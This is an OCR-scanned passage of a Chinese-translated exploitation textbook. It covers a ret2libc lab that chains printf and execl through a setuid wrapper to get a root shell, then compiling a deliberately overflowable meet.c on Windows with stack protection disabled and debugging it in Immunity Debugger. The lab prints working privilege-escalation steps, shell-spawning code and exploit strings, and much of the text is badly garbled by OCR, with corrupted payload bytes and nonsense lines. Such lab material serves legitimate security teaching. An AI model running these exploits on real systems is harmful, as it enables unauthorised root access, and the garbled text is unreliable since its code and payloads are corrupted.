将 返回 路 径 和 选项 加 载 到 函数 栈 上 , 当 我 们 重 写 EIP 时 , 就 能 将 程序 流 导向 到 程序 的 
其 他 部 分 。 因 为 已 将 有 效 的 返回 地 址 和 数据 位 置 加 载 到 栈 上 ， 所 以 程序 不 知道 它 已 
改变 ， 这 使 我 们 能 利用 这 些 技术 来 局 动 目标 shell。 


12.2.5 ”实验 12-6: 使 用 ret2libc 保 持 权限 


东 些 情况 下 , 我 们 最 终 可 能 没有 root 权 限 。 这 是 因为 在 条 些 系统 上 ， 系统 和 bash 
的 默认 行为 是 在 启动 时 降低 权限 。 安 装 在 Kali 发 行 版 上 的 bash 不 会 这 么 做 , 但 Red 
Hat 和 其 他 发 行 版 却 是 如 此 。 

本 实验 将 使 用 Kali Rolling。 为 解决 权限 下 降 的 问题 ， 我 们 需要 使 用 一 个 包 小 程 
FF. RFE [systemo H. 然后, 我 们 使 用 不 会 降低 权限 的 execl0 函 数 来 调用 它 。 
包装 程序 的 代码 看 起 来 像 这 样 : 

# cat wrapper.c 

int main() { 

setuid (0); 
setgid(0); 
system("/bin/sh"); 

} 

# gcc -o wrapper wrapper.c 

注意 ， 不 需要 将 这 个 包装 程序 设置 为 SUID， 现 在 需要 用 execl0 函 数 来 调用 包装 
程序 ， 就 像 这 样 : 


execl("./wrapper", "./wrapper", NULL) 


现在 还 有 一 个 问题 需要 解决 :调用 execl0 函 数 的 最 后 一 个 参数 是 NULL。 稍 后 
会 处 理 它 。 让 我 们 爷 用 一 个 简单 的 测试 程序 来 测试 execl0 函 数 ， 以 确保 当 以 root 用 户 
身份 运行 它 时 不 会 降低 权限 : 

t cat Lest execl.c 

int main() { 


execl("./wrapper", "./wrapper", 0); 


} 
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ZR VE e JF Si FE vuln2.c— TF ix SUID: 


t gcc -o test execl test execl.c 

# chown root.root test execl 

# chmod u+s test execl 

# ls -1 test execl 

-rwsr-xr-x 1 root root 7460 Jul 3 02:24 test execl 


# su joeuser 

2 

运行 该 程序 并 测试 其 功能 : 

$ ./test execl 

# 1d 

uid=0 (root) gid=0 (root) groups=0 (root) , 1000 (jJoeuser) 

# exit 

KET! SLE ELS INE UG ORT. BETOKR AE BECERRA RAs 
字 市 即 可 。 有 几 种 方法 可 实现 这 个 目标 ， 但 为 了 更 好 地 进行 演示 ， 我 们 将 使 printf0 
冰 数 作为 execl0 函 数 的 包装 器 。 回 顾 一 下 ，%hn 格 式 控 制 符 可 用 来 回 内 存 位 置 写 入 
数据 。 为 此 ， 我 们 需要 将 多 个 libc 函 数 调 用 链接 起 来 ， 如 图 12-5 所 示 。 


execl0 之 后 的 返回 地 址 


图 12-5 将 多 个 libc 函 数 调用 链接 起 来 


与 前 面 的 做 法 类似 ， 我 们 将 使 用 glibc 函 数 printfO 的 地 址 来 重 写 之 前 保存 的 EIP。 
届时 ， 当 最 初 的 漏洞 函数 返回 时 ， 这 个 新 保存 的 EIP 会 从 栈 上 弹出 ， 并 且 printf0 将 得 
以 执行 ， 其 参数 以 %6\Sn 开 头 ， 而 这 会 将 格式 化 字符 串 中 直到 格式 控制 待 之 前 的 字 
节 数 目 (0x0000) 写 入 第 3 个 直接 参数 中 。 由 于 第 3 个 参数 包含 自己 的 位 置 ， 因 此 值 
0x0000 将 会 被 写 入 该 位 置 。 接 下 来 调用 execl0 函 数 ， 其 参数 来 自前 方 第 一 个 
"/wrapper" 字 从 串 。 公 此， 我 们 就 已 使 用 这 个 日 修改 的 缓冲 区 攻击 字符 串 动态 创建 
了 想 运 行 的 execl0 函 数 。 

为 构建 上 和 面 的 汤 洞 攻击 程序 ， 需 要 下 列 信息 : 

e printfQ PR Zi d 

e execl0 国 数 的 地 址 
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e %6\$n 字 符 串 在 内 存 中 的 地 址 (使 用 环境 变量 内 存 区 ) 

e "./wrapper" 字 符 串 在 内 存 中 的 地 址 (使 用 环 场 变 量 内 存 区 ) 
e 希望 使 用 空 值 对 值 进行 章 写 的 内 存 地 址 

接 下 来 从 这 个 列表 的 最 上 面 开始 逐一 获取 这 些 地 址 : 


$ $ gdb -q vuln2 

Reading symbols from vuln2...done. 

(gdb) b main 

Breakpoint 1 at Ox5b1: file vuln2.c, line 5. 
(gdb) r 

Starting program: /root/chl12/vuln2 


Breakpoint 1, main (argc-1, argv-Oxbffff764) at vuln2.c:5 

9 strcpy (buffer, arqv[11); 

(gdb) p printf 

$1 = {<text variable, no debug info»] 0xb7e46930 < printf> 
(gdb) p execl 

$2 = {<text variable, no debug info>} O0xb/eae750 < GI execl> 


(gdb) q 
A debugging session is active. 


Inferior 1 [process 14355] will be killed. 


Quit anyway? (y or n) y 


BAN 45 158 FS JA Ses ee PT EAN DOR ETTR, REA UT RIT] SE RE 
get_env 来 获取 它们 的 位 置 。 记 住 ，get_env 程 序 需 要 与 漏洞 程序 (在 本 例 中 是 vuln2) 
具有 相同 的 文件 名 长 度 (5 个 字符 ): 

$ cp getenv gtenv 

HUE. BATT CE a EE BOA EP EIT: 


$ export FMTSTR="%6\Sn" #escape the $ with a backslash 
S echo SFMTSTR 

$6Sn 

$ ./getenv FMTSTR 

FMTSTR is located at Oxbfffffl6 


$ export WRAPPER-"./wrapper" 

$ echo SWRAPPER 

./wrapper 

$ ./gtenv WRAPPER 

WRAPPER is located at Oxbfffff23 


ER ST PUR TA AN BUN CAAA mx. ZJUüxE 
IME. RITA Te E B ds E DCN S PR RE, ETA AA RE 
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缓冲 区 ， 当 进入 漏洞 函数 main0 时 ， 它 位 于 栈 项 。 在 实际 应 用 中 ， 还 需要 深入 地 研 
完 一 一 授 过 三 看 反 汇 编 代码 并 进行 一 些 试销 之 后 方 能 找 出 漏洞 绥 冲 区 的 位 秆 。 


$ $ gdb -q vuln2 

Reading symbols from vuln2...done. 

(gdb) b main 

Breakpoint 1 at Ox5b1: file vuln2.c, line 5. 
(gdb) r 

Starting program: /root/chl12/vuln2 


Breakpoint 1, main (argc-1, argv-Oxbffff754) at vuln2.c:5 
9 strcpy (buffer, argv[1]); 

(gdb) disas main 

Dump of assembler code for function main: 


0x800005a0 <+0>: push | $ebp 
0x800005al <+1>: mov besp, sebp 
0x800005a3 «t3»: push %ebx 
0x800005a4 <+4>: sub S0x8,$esp 


«truncated for brevity> 


既然 已 经 知道 漏洞 缓冲 区 的 大 小 (9)， 就 能 计算 出 第 6 个 内 存 区 的 地 址 : 8 + 6 * 4 
=32= 0x20。 因 为 我 们 将 在 最 后 的 位 置 放 入 4 个 字 节 ,所 以 攻击 缓冲 区 的 总 大 小 为 36 

接 下 来 ， 我 们 把 一 个 具有 代表 性 大 小 (52 字 节 ) 的 缓冲 区 传递 给 漏洞 程序 ， 并 使 
用 gdb 通 过 打印 $esp 值 的 方式 找 出 漏洞 组 证 区 的 起 始 位 置 : 

(gdb) r “perl -e 'print "A"x52' 

The program being debugged has been started already. 


Start it from the beginning? (y or n) y 
Starting program: /root/chl2/vuln2 "perl -e 'print "A"x52'" 


Breakpoint 1, main (argc-2, arqgv-Oxbffff714) at vuln2.c:5 
9 strcpy (buffer, argv[11); 

(gdb) p Sesp 

$1 = (void *) Oxbffff66c 


既然 已 经 找到 漏洞 缓冲 区 的 起 始 位 置 ， 那 么 与 前 面 计算 出 的 偏 移 相 加 即 可 得 出 
正确 的 目标 位 置 (在 漏 铜 绥 剖 区 之 后 的 第 6 个 内 存 区 ): 
Oxbffff66c + 0x20 = Oxbffff68c 


最 后 ， 在 获得 所 需 的 所 有 数据 之 后 ， 开 始 攻击 吧 ! 


./vuln2 “perl -e 'print "A"x15. 
"\x30\x69\xe4\xb7\x50\xe7\xea\xb7\x16\xff\xff\xbf\x23\xff\xff\xbft\ 
x23 xff\xff\xbf\xBc VSG xt yep" " 

# id 

uid=0 (root) gid=0(root) groups=0 (root) , 1000 (joeuser) 
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# exit 


成 功 了 ! 有 些 人 可 能 已 经 看 出 这 里 有 捷径 可 走 。 如 果 仔细 观察 最 后 的 演示 ， 就 
会 注意 到 攻击 字符 串 的 最 后 一 个 值 是 NULL。 偶 尔 会 遇 到 这 种 情况 。 遇 到 这 种 罕见 
情况 时 ， 不 必 在 意 是 否 向 漏洞 程序 传 入 了 一 个 空 字 节 ， 反 正字 符 串 均 会 以 NULL 结 
尾 。 因 此 ， 在 这 种 固定 的 场景 中 ， 可 以 移 除 printf0 函 数 ， 简 单 地 通过 以 下 方式 将 攻 
击 字符 串 传 入 execl0 函 数 : 


./vuln2 [filler of 28 bytes] [&execl] [&exit] [./wrapper] [./wrapper] 

试 一 下 : 

S ./vuln2 "perl -e 'print "A"x15. 

"AxDoDiEGrTXxeaxD7XAxeDYixb7Axe2 VxXbTXXZ3XXEFEVXEEVxBEVX2JAXTEVXEFXxbE" 

# id 

uid=0 (root) gid=0(root) groups=0 (root) , 1000 (joeuser) 

# exit 

上 述 两 种 方法 在 这 里 都 可 行 。 但 在 实际 应 用 中 我 们 不 可 能 总 是 如 此 圣 运 ， 因 此 
需要 同时 掌握 这 两 种 方法 。 有 关 Retum to Libc 的 更 多 创新 方法 , 请 参见 “扩展 阅读 ”。 

当 出 现 权 限 下 降 的 问题 时 ， 可 利用 其 他 函数 调用 来 绕 过 那些 导致 权限 下 降 的 函 
数 调用 。 在 本 例 中 ， 利 用 printtO 函 数 的 内 存 重 写 能 力 将 NULL 终 止 符 写 入 了 execl0) 
水 数 的 最 后 一 个 参数 。 通 过 使 用 ret2libc 来 链接 这 些 函 数 调 用 ， 我 们 不 需要 再 担心 在 
栈 上 放置 可 执行 代码 ， 并 可 对 压 入 栈 的 函数 使 用 更 复杂 的 选项 。 


12.26 ”结论 


既然 我 们 已 经 讨论 了 一 些 单 见 的 内 存 保护 技术 ， 那 么 如 何 将 它们 组 合 起 来 使 用 
We? 在 评论 过 的 几 种 组 合 中 , ASLR(PaX 和 PIE) 以 及 不 可 执行 内 存 (PaX 和 ExecShield) 
技术 同时 提供 了 对 栈 和 堆 的 保护 。StackGuard、StackShield、SSP 和 Libsafe 只 提供 了 
对 基于 栈 的 攻击 的 防御 。 表 12-3 展 示 了 这 些 方 案 之 间 的 差异 。 


表 12-3 ”各 种 方案 之 间 的 差异 
内 存 保护 机 制 基于 堆 的 攻击 
不 进行 保护 存在 漏洞 
StackGuard、StackShield、SSP 存在 漏洞 
PaX/ExecShield 提供 保护 
Libsafe 仓 在 漏洞 


ASLR(PaX/PIE) 提供 保护 提供 保护 
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12.3 本章 小 结 


本 章 研 究 了 格式 化 字 从 串 漏洞 以 及 如 何 利 用 这 些 漏洞 泄露 数据 并 影响 应 用 程序 
执行 的 流程 。 巡 过 格式 化 字符 串 请 求 额外 的 数据 ， 可 以 短 露 会 泄露 有 关 变 量 和 栈 内 
容 信息 的 内 存 位 置 。 

此 外 ， 还 可 以 使 用 格 云 化 字符 串 来 改变 内 存 位 置 。 信 助 一 些 基 本 的 数学 运算 ， 
我 们 可 以 如 过 更 改 内 存 的 内 容 以 改变 应 用 程序 的 执行 流程 ， 或 过 过 将 实 参 添加 到 栈 
和 修改 EIP 的 值 来 影响 程序 的 执行 。 这 些 技 术 会 导致 可 执行 任意 代码 , 允许 提升 本 地 
权限 或 远程 执行 网 络 服 务 。 

我 们 也 观察 了 像 栈 保护 和 布局 随机 化 之 类 的 内 存 保护 拉 术 ， 然 后 调查 了 一 些 规 
避 的 基本 方法 。 我 们 可 以 利用 ret2libc 攻 击 来 控制 程序 执行 ， 便 助 libec 函 数 ， 能 午 定 
问 应 用 程序 的 执行 流程 到 已 知 函 数 ， 这 些 函 数 的 位 置 及 其 参数 部 已 压 入 栈 。 这 允许 
函数 在 不 执行 堆栈 上 的 代码 的 情况 下 运行 ， 并且 避 人 免 了 必须 猪 测 内 存 的 位 置 。 

将 这 些 技术 结合 起 来 ， 我 们 就 拥有 了 能 更 好 地 应 对 现实 世界 中 各 种 系统 的 工具 
箱 ， 并 有 能 力 利用 这 些 复 末 的 攻击 来 开 友 更 局 级 的 漏洞 攻击 程序 。“ 道 局 一 尺 ， 奢 噩 
一 丈 ”， 为 更 好 地 理解 保护 技术 及 其 攻击 策略 的 进展 ,“ 扩 展 阅 读 ” 中 提供 了 额外 的 
材料 以 供 得 阅 。 
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Microsoft Windows 是 运 今 为 止 最 常用 (包括 企业 使 用 和 个 人 使 用 ) 的 操作 系统 ， 
如 图 13-1 所 示 。 图 13-1 中 显示 的 百分比 虽然 经 党 变化 ， 但 仍然 可 以 清晰 地 了 人 解 操作 
系统 市 场 的 份额 分 布 。 在 撰写 本 书 时 ，Windows 7 仍 在 市 场 中 占据 统治 地 位 ， 约 占 
50%; 目前 Windows 10 也 正在 快速 增长 。 根 据 贡 规 漏洞 攻击 和 探索 零 日 漏洞 的 情况 ， 
可 以 较 清 楚 地 看 到 应 当 将 哪 类 Windows 操 作 系 统 作 为 目标 。 与 Windows 10 相 比 ， 
Windows 7 更 容易 遭受 攻击 ， 这 是 因为 ，Windows 7 更 缺 乏 控 制 流 防 护 (Control Flow 
Guard，CFG) 等 安全 功能 和 攻击 反 制 措施 。 本 章 后 面部 分 和 第 14 章 将 介绍 有 关 最 重 
要 的 安全 功能 和 反 制 措施 的 示例 。 


RES MS PIER: 
e 编译 和 调试 Windows 程 序 
e 编 扎 Windows 漏 铜 攻击 程序 
e 理解 结构 化 异 第 处 理 (Structured Exception Handling, SEH) 
e 理解 和 绕 过 基本 的 汤 洞 攻击 反 制 指 施 ， 如 SafeSEH 和 SEHOP 
Ht: 3.42906 
Windows 8: 1.42% 
Linux: 2.5395 
Mac OS X 10.12: 3.5296 
Windows XP: 6.1% 
Windows 8.1: 6.48% 


Windows 7: 48.91% 
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&l13-1 各 操作 系统 份额 占 比 
13.4 编译 和 调试 Windows 程 序 


Windows 操 作 系 统 本 喘 并 没有 包含 任何 开发 工具 ， 但 笠 运 的 是 ，Windows 
Community Edition 人 允许 用 户 编 译 程序 供 教 学 之 用 (如 果 已 经 有 了 许可 版 本 的 副本 , 可 
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将 其 用 于 本 章 的 实验 )。 通 前 ， 可 以 免责 下载 捆绑 到 Visual Studio 2017 Community 
Edition 中 的 编译 融 。 本 市 将 演示 如 何 搭建 Windows 漏 洞 攻 击 开 发 工作 站 。 


13.1.1 实验 13-1: 在 Windows 上 编译 程序 


可 从 https//www.visualstudio.com/vs/visual-studio-express/ 下 载 可 免费 使 用 的 
Microsoft C/C++ Optimizing Compiler and Linker。 在 这 个 实验 中 ,可 使 用 Windows 7、 
Windows 8 或 Windows 10 的 32 位 和 64 位 版 本 。 利 用 上 和 面 的 链接 下 载 和 运行 安装 程序 。 
看 到 提示 窗口 后 ， 选 择 Desktop Development with C++ 选项 ; 除了 以 下 选项 外 ， 不 要 
选 其 他 选项 。 

e VC+ 2017 v141 toolset (x86,x64) 

e Windows 10 SDK (10.0.15063.0) for Desktop C++ x86 and x64 

也 可 接受 所 有 可 选 的 默认 选项 ; 但 要 记 住 ， 每 个 选项 都 会 占用 额外 的 硬盘 空 
则 。 特 定 的 SDK 有 版 本 号 可 能 有 所 不 同 ， 具体 取决 于 下 载 时 点 的 版 本 堪 弄 。 下 载 和 
ate TE AE fej #2, Visual Studio 2017 Community 版 本 中 有 一 个 Start 亲 早 链 接 。 
单 击 Windows Start 近 钮 ， 并 输入 prompt。 此 时 将 打开 一 个 窗口 ， 显 示 各 种 命令 提 
示 符 的 快捷 方式 。 双 击 Developer Command Prompt for VS 2017。 这 是 一 个 特殊 的 
monet, BAAS oR SM Ade. Wace State BREE, SAE 
C:UkzJ)28I H = PR Developer Command Prompt. ‘E8482 A aeC:\ProgramData\ 
Microsoft Windows Start Menu\Programs\Visual Studio 2017\Visual Studio Tools F». i fll 
Developer Command Prompt 后 ， 转 到 Cgrayhat 文 件 光 。 要 测试 命令 提示 人 符 ， 首 先 使 
用 hello.c 和 meet.c 程 序 。 使 用 Notepad.exe 等 文本 编辑 器 ， 输 入 以 下 示例 代码 ， 将 其 保 
和 存 到 Ci\grayhat 文 件 夹 的 hello.c 文 件 中 : 

C:\grayhat>type hello.c 

/ /hello.c 

#include <stdio.h> 

main ( ) { 

printf ("Hello haxor"); 


} 
Windows 编 译 器 是 cl.exe。 将 源 文件 的 名 称 传 递 给 编译 器 ， 生 成 hello.exe， 如 下 
所 示 : 


c:\grayhat>cl.exe hello.c 
Microsoft (R) C/C++ Optimizing Compiler Version 19.11.25507.1 for x86 
Copyright (C) Microsoft Corporation. All rights reserved. 


hello.c 


Microsoft (R) Incremental Linker Version 14.11.25507.1 
Copyright (C) Microsoft Corporation. All rights reserved. 
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/out:hello.exe 
hello.obj 


c:\grayhat>hello.exe 
Hello haxor 


很 简单 吧 ? 下面 就 来 构建 下 一 个 程序 meet.exe。 使 用 以 下 代码 创建 meet.c 源 代 
并 使 用 cl.exe 在 Windows 系 统 上 进行 编译 。 


C:\grayhat>type meet.c 
/ /meet.c 
#include <stdio.h> 
greeting(char *templ, char *temp2) { 
char name[400]; 
strcpy (name, temp2); 
printf("Hello $s %s\n", templ, name); 
} 
main(int argc, char *argv[]) { 
greeting(argv[1], argv[2]); 
printf ("Bye $s $s\n", argv[1], argv[2]); 
} 
c:\grayhat>cl.exe meet.c 
Microsoft (R) C/C++ Optimizing Compiler Version 19.11.25507.1 for x86 
Copyright (C) Microsoft Corporation. All rights reserved. 


meet.c 
Microsoft (R) Incremental Linker Version 14.11.25507.1 
Copyright (C) Microsoft Corporation. All rights reserved. 


/out:meet.exe 
meet .ob] 


c:\grayhat>meet.exe Mr. Haxor 
Hello Mr. Haxor 
Bye Mr. Haxor 


13.1.2 Windows 编 境 选 项 


如 果 输 入 cl.exe 2?， 就 会 看 到 一 个 长 长 的 编译 选项 列表 。 这 里 并 不 需要 关注 其 中 


大 多 数 选 项 。 表 13-1 列 举 并 摘 述 了 本 章 中 将 要 使 用 的 一 些 编 详 选项 。 


表 13-1 本 章 将 使 用 的 一 些 编译 选项 


选项 说 明 
/Zi 生成 额外 的 调试 信息 ， 这 在 使 用 Windows 调 试 器 时 非常 有 用 ( 稍 后 演示 ) 


水 来 命 


与 gcc 的 -0 选项 相似 。Windows 编 译 器 默认 情况 下 会 使 用 与 源 文件 相同 的 名 ; 


/Fe 名 输出 的 可 执行 文件 ， 只 是 将 上 展 名 改 为 .exge。 如 采 硕 望 永 用 别 的 名 称 ， 可 指定 


这 个 选项 并 在 这 个 选项 后 面 注 明 想 要 使 用 的 .exe 文 件 名 
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选项 说 明 
"— /GS 选项 从 Visual Studio 2005 开 始 丈 默 认 打 开 f, 它 提 供 了 堆栈 检测 保护 机 制 。 如 
/ 果 希 望 禁 用 它 以 便 进行 测试 ， 可 使 用 /GS- 选 项 
因为 接 下 来 准备 使 用 调试 侨 ， 所 以 这 里 在 构建 meet.exe 时 选择 了 全 部 调试 信息 ， 
但 是 ， 禁 用 堆栈 检测 功能 : 
c:\grayhat>cl.exe /Zi /GS- meet.c 


Microsoft (R) C/C++ Optimizing Compiler Version 19.11.25507.1 for x86 
Copyright (C) Microsoft Corporation. All rights reserved. 


meet.c 
Microsoft (R) Incremental Linker Version 14.11.25507.1 
Copyright (C) Microsoft Corporation. All rights reserved. 


/out:meet.exe 
/ debug 
meet.obj 


c:\grayhat>meet.exe Mr. Haxor 
Hello Mr. Haxor 
Bye Mr. Haxor 


wd 注意 : /GS 选项 开关 可 启用 Microsoft 的 堆栈 检测 保护 机 制 ，/GS 在 阻止 缓冲 
\_ 写 ”区 溢出 攻击 方面 晶 有 成 效 。 在 未 使 用 这 项 检测 保护 功能 时 ， 为 了 研究 软件 
中 的 现 有 漏洞 ， 往 往 需 要 使 用 /GS- 选 项 将 该 功能 共用 。 


既然 现在 已 经 有 了 一 个 包含 调试 信息 的 可 执行 文件 ,那么 下 面 就 来 安装 调试 句 ， 
并 了 解 如 何在 Windows 上 进行 调试 ， 与 UNIX 系 统 上 的 调试 体验 做 对 比 。 

本 实验 使 用 Visual Studio 2017 Community Edition 编 译 hello.c 和 meet.c 这 两 个 程 
序 ， 且 在 编译 meet.c 程 序 时 加 入 了 全 部 调试 信息 ， 这 对 我 们 进行 下 一 个 实验 非常 有 
帮助 。 同 时 我 们 得 看 了 实际 操作 中 可 能 用 到 的 多 种 编译 选项 ， 包 括 茶 用 /GS 选 项 对 
应 的 漏洞 攻击 反 制 功能 。 


13.1.3 ”在 Windows 上 使 用 lImmunity Debugger 进 行 调试 


Immunity Debugger 是 一 于 流行 的 用 户 模 式 调 试 占 ， 可 以 从 https:/Wwww. 
immunityinc.com/products/debugger/ 下 载 。 在 撰写 本 书 时 ，Immunity Debugger 的 稳定 
版 本 是 1.85, 这 也 是 本 章 所 使 用 的 版 本 。Immunity Debugger 的 主 界面 分 为 五 个 部 分 。 

“代码 (Code)” 或 “ 反 汇 编 (Disassemblem ”区 (左上 方 ) 用 来 得 看 已 被 反 汇 编 的 代码 
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模块 。“ 寄 存 右 (Register)” 区 (右上 方 ) 用 来 实时 监测 寄存 右 的 状态 。“ 内 存 转 储 (CHex 
Dump)” 或 “数据 (Data)” 区 (左下 方 ) 用 于 但 看 指定 内 存 地 址 的 十 六 进 制 转 储 内 容 。 
“堆栈 (Stack)” 区 ( 右 下 方 ) 则 用 来 实时 显示 堆栈 信息 。“ 信 息 (Information)” 区 ( 左 中 

部 ) 则 用 于 显示 与 代码 区 高 腕 部 分 的 指令 对 应 的 信息 。 在 每 一 部 分 , 都 可 右 击 查看 上 
PMS. Immunity Debugsger 窗 口 的 撒 部 还 有 基于 Python 的 shell 界 面 ， 访 界面 文 持 
完成 各 种 目 动 化 任务 ， 也 可 以 执行 脚本 来 帮助 开 有 漏洞 攻击 程序 。 在 继续 之 前 ， 从 
上 述 链 接 下 载 和 安装 Imnmunity Debugger. 

可 通过 以 下 几 种 方式 使 用 Immunity Debugsger 开 始 调试 程序 : 

e 打开 Immunity Debugger 并 选择 File | Open. 

e 打开 Immunity Debugger 并 选择 File | Attach. 
从 命令 令 行 (比如 在 Windows IDLE Python 提 示 符 下 ) 调 用 Immunity Debugger， 


>>> import subprocess 
>>> p = subprocess.Popen(["Path to Immunity Debugger", "Program to 
Debug", "Arguments"],stdout-subprocess.PIPE) 


PN, Seiya ATA H)meet.exeTz FH ABE A408 TA, Hon ERAN P TRES 
fr BN: 


>>> import subprocess 

>>> p = subprocess. Popen(["C:\Program Files (x86) \Immunity Inc\Immunity 
Debugger\ImmunityDebugger.exe", "c:\grayhat\meet.exe", "Mr", 
"A™"*408],stdout=subprocess.PIPE) 


上 面 的 命令 行将 从 Immunity Debugger 内 部 启动 meet.exe， 如 图 13-2 所 示 。 


& Immunity Debugger - bugger - bugg - [CPU - main thread, module meet] a)! x 
[C] File View Debug Plugins ImmLib Options Window Help Jobs |- |E] x] 
2» SR) «X b I lemtw Pi bea as 78 
@6254CFE|| . Al a8 Cra 76 MOU Pan DOn Ai Re Registers CFPU» 
í z - + Tay ; | T 
SCEAMOUNDUORDEPIRDS | ECX 00900500 ^ — $5 7 
: EDX Ea meet .<Module 
‘BX 7FFD480 
go 
- 56 USH ESI. | DBBBBDODO 
08254D12 |I. » DY : HHH 
08254D15 j ia | 
-[BB827CFA48 1- anaaadaa HB2514F9 meet .<Module 


| À | 4660004 
4627 BH38 | : | | ?FFD48BB | . 


[14:18:59] Program entry point | [Paused 
图 13-2 TEImmunity Debugger 的 主 界 面 中 司 动 meetexe 
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在 学 习 Immunity Debuggerll] , 需要 了 解 表 13-2 所 示 的 第 用 命令 (如 果 使 用 mac OS 
主机 ， 需 要 将 这 些 命令 传 给 Windows 虚 拟 机 ， 并 映射 快捷 键 绑 定 )。 


表 13-2 Immunity Debugger 的 常用 命令 


快捷 键 用 途 
F2 设置 断 点 (bp) 
F7 蛙 步 执行 并 进入 函数 
F8 FOE By FF bat ER ZU H 
F9 继续 执行 到 下 一 个 断 点 、 异 间或 退出 
Ctr-K 显示 图 数 调用 树 
Shift+F9 RE NENET ETT AE 
单 击 代码 区 并 按 下 AltrE 输出 己 链 接 的 可 执行 模块 的 列表 
rom ms 查看 寄存 器 值 对 应 的 堆栈 或 内 存 位 置 


Ctrl+F2 Ha val aes 


接 下 来 ， 为 与 本 书 的 示例 保持 一 致 ， 可 在 任意 窗口 中 右 击 ， 选 择 Appearance | 
Colors (All), 再 从 列表 中 选择 颜色 , 调整 颜色 方案 。 本 节 的 示例 使 用 的 是 Scheme 46 
色 背 景 )。 另 外 选中 了 No highlighting. Immunity Debugger 有 时 不 支持 设置 的 保 
存 (原因 未 知 )， 因 此 ， 可 能 需要 多 次 更 改 外 观 方案 ， 才 会 生效 。 

从 Immunity Debugger 中 启动 程序 时 ， 调 试 器 会 自动 暂停 。 这 样 就 可 在 继续 运行 
之 前 先 设置 断 点 并 检查 调试 会 话 的 目标 。 男 外 ， 在 开始 时 就 先 检查 被 调试 程序 中 链 
~ 了 本 总 是 一 个 好 主意 ， 如 图 13-3 所 示 。 


File View Debug Plugins ImmLib Options Window Help Jobs | 
OPER XP SPA LG a e4i lemtwhcPkbzr..s? SecuriTeam Secure Disclosure is lox 
中 |C| CPU - main thread, module meet 


ow o EB PA29HBHHE CALL meet. security init cookie |Registers FPUY 
n819?14FE, .^E9 35FEFFFF JMP meet .__tmainCRIStartup E EAX 265853C33 kernel32 
081715483 xx | 


08191588 | Tp | | | Te lue | 
Eee n" 
H619150A | Base | | 

641715685 | HA 

08191580C 
6417156) 75 18 
6617156E 
UB17158F 


图 13-3 ”在 Immunity Debugger 中 检查 程序 中 链接 的 模块 


这 里 可 看 到 只 有 kernel32.dll、KERNELBASE.dll 和 ntdll.dll 被 链接 到 meet.exe。 这 
个 信息 对 我 们 非常 有 用 。 稍 后 将 看 到 , 这 些 模块 含有 一 些 可 用 于 漏洞 攻击 的 操作 码 。 
注意 ,由 于 使 用 了 地 址 空间 布局 随机 化 (Address Space Layout Randomization, ASLR) 
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技术 和 其 他 因素 ， 每 个 系统 中 的 地 址 会 有 所 不 同 。 


13.14 ”实验 13-2: 程序 月 省 


为 完成 本 实验 ， 需 要 从 前 面 提 到 的 网 址 下 载 Immunity Debugger 并 安装 到 测试 用 
的 Windows 系 统 上 。Immunity Debugger 依 赖 于 Python 2.7， 夺 测试 的 机 器 上 原先 没有 
安装 Python 2.7， 则 在 安装 Immunity Debugger 的 过 程 中 Python 2.7 会 被 目 动 安装 。 安 
装 完 毕 后 ， 就 可 对 已 经 编译 过 的 程序 meet.exe 进 行 调试 了。 在 Windows 7 系统 中 运行 
Python IDLE， 并 键入 如 下 命令 : 

>>> import subprocess 

>>> p = subprocess. Popen(["C:\Program Files (x86) \Immunity Inc\Immunity 


Debugger\ImmunityDebugger.exe", "c:\grayhat\meet.exe", "Mr", 
"A"*408],stdout=subprocess.PIPE) 


# If on a 32-bit Windows OS you will need to remove the (x86) from the path. 


ft LTRS, Ros f fp PxS408 T A338 TSR, PEP SE ans TE 
制 下 自动 启动 。 这 408 个 A 会 导致 缓冲 区 浇 出 。 现 在 我 们 已 准备 好 分 析 这 个 程序 。 我 
们 感 兴趣 的 是 在 greeting0 函 数 中 调用 了 strepy0， 因 为 strepyO 缺 少 边界 检查 而 存在 汤 
iH. P uBrtExecutable Modules 徐 口 ( 用 Altt+E 打 开 ) 找 到 该 函数 一 一 双击 meet 模 块 ， 
就 会 显示 meet.exe 程 序 的 函数 指针 。 这 里 我 们 可 以 看 到 该 程序 的 所 ARROA 本 例 而 
言 是 greeting0 和 main0)。 使 用 同 下 方 同 键 移 到 JMP meetgreeting 那 行 ， 然 后 按 Enter 
健 ， 这 样 就 会 顺 看 JMP 语 句 转 入 greeting0 函 数 ， 如 图 13-4 所 示 。 


= 


[C | File View Debug Plugins lmmLib Optons Window Help Jobs 


96191081 
pan 91 882 cc I NT3 he " uH I HT 3 
Bgi91883 GC INI3 — ant — 
ae 184 - 
ARIFIP25 |). ALEC JAA BAAA RUR ESP’ 198 
EE 1 E9 deme Jne E meet .sreeting | BBl91g29 || - 8B45 ac nou EAX, DWORD PTR SS:[EBP«CI 
: umn9igzc||. 58 SH ENX Src 
cene rose INT3 B819182D | . 8D8D 79FEFFFF LEA QEGR, DUORD PTR SS:LEBP-1901 | 
; amiyieza l| - Si ECK inet 
cbe E PE BgBi9i1B34||. ER H7H2BMEBH strepy trepy 
EHE BN ER pie 8191839 | - 83C4 aa ADD ESP.8. 
3017101: INT: B191B3C | | 8D95 7BFEFFFF LEA ED, DWORD PTR SS:IEBP-1981 
G81971614) — CC INI ar 9142 52 FU 
cem Ee Mg BH191843||- BB45 aa MOU EAX,DWORD PTR SS:IEBP-*8] 
AG 91 A 6 CC INI a1 91846 5a PU Cx) 
E IE e iu pasiB47||. 68 BARR BRA PUSH meet. Api BRABR format = “Hello xz xsi" 
ad 941d cc INT3 1971 i|. EB 277 AAR meet.printf printf 
718 Be 91851 83C4 HC ADD ESP, HC 
619161A CC INT3 191 BHES MOU ESP.EHP 
TET Cc INT3 Hes EHE e 
pgi9iasic CC INT3 1 2 BI 
9B19iBiD| CC INT3 Bis 


13-4 在 Immunity Debugger 中 查找 函数 


注意 : 如 果 没 有 看 到 preeting、strcpy 和 printf 等 符号 名 ， 那 么 很 可 能 是 在 编 
译 二 进 制 时 没有 包含 调试 符号 。 也 可 使 用 一 个 更 大 的 跳 转 表 (Jump Table)， 
具体 取决 于 测试 时 使 用 的 Windows 版 本 。 在 Windows 10 Enterprise( 而 非 
Windows 7 Professional) 下 编译 ， 会 产生 不 同 的 结果 。 如 果 在 查看 屏幕 时 仍 
然 看 不 到 右 侧 的 符号 ， 只 需要 使 用 下 一 段 中 的 指令 查找 字符 串 ASCII 
"Hello %s %s"， 并 在 其 上 几 行 的 call 指 令 行 停 下 。 
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SB? Gm je IX ih 


BEAR mi 22 rA Disassemblerf&i O P HJgreetingO RIAL, 那么 可 在 调用 有 漏洞 的 函数 
